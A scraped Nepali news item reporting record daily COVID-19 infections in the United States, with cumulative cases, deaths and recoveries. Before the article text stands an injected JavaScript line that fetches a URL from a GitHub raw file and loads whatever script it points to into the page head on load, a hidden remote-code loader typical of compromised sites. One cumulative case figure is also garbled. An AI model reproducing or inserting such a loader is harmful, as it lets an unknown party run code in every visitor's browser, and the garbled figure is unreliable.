;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
कात्तिक २१,
काठमाडौं । अमेरिकामा हालसम्मकै धेरै कोरोना संक्रमित पुष्टि भएको छ ।
बिहिबार त्यहाँ एकैदिन १ लाख २० हजार ९ सय २१ जनामा कोरोना संक्रमण पुष्टि भएको हो ।
बुधबार मात्रै त्यहाँ १ लाख १० हजार बढीमा संक्रमण पुष्टि भएको थियो । अमेरीकामा कोरोना संक्रमित हुनेको संख्या पनि एक कोरोड नजिक देखिएको छ । हालसम्ममा त्याहाँ ९,९ लाख १९ हजार ५ सय २२ जनामा संक्रमण पुष्टि भएको छ ।
त्यस्तै २ लाख ४० हजार ९ सय ५३ जनाको मृत्यु भएको छ । भने ६३ लाख ४० हजार ४ सय ७२ जना निको भएका छन् ।
फेसबुक प्रतिक्रियाहरु